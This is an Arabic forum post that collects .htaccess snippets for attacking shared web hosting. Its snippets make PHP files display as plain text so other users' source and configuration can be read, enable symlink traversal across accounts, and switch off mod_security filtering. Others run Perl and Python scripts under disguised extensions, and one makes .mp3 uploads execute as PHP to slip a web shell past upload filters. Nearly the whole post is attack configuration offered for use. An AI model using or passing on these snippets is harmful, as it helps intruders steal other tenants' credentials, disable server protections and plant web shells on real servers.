مكتبة htaccess و تخطي Forbidden

0




كود:
Options FollowSymLinks MultiViews Indexes ExecCGI 
كود:
Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php 

كود:
Options All DirectoryIndex ssss.html addType txt .php AddHandler txt .php <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> 
كود:
Options All ReadMeName 1.txt 

كود:
suPHP_ConfigPath /home/user/public_html/php.ini 

كود:
Options all 



كود:
Options +FollowSymLinks DirectoryIndex Sux.html Options +Indexes AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html 

وهذا افضل هتاكس وجديد 


كود:
Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php <IfModule mod_autoindex.c> IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble </ifModule> <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> 

طيب 

هتاكس تشغيل البايثون
كود:
AddType application/x-httpd-cgi .py AddHandler cgi-script .py AddHandler cgi-script .py 

هتاكس تشغل السيملنك
كود:
<Directory "/home"> *** Options -ExecCGI* *** AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks </Directory> 

سحب ملف بصلاحيه يوزر 

كود:
AddType text/plain .php Options +Indexes DirectoryIndex filename.html 
تشغيل البيرل باي امتداد
كود:
AddHandler cgi-script .CH AddHandler cgi-script .txt AddHandler cgi-script .pp AddHandler cgi-script .pl 
تخطي انترنت سيرفر ارور



كود:
<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> 
تغير اصدار ال php



كود:
AddType application/x-httpd-php4 .php 

تخطي مراكز التحميل رفع الشل باي امتداد

كود:
<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>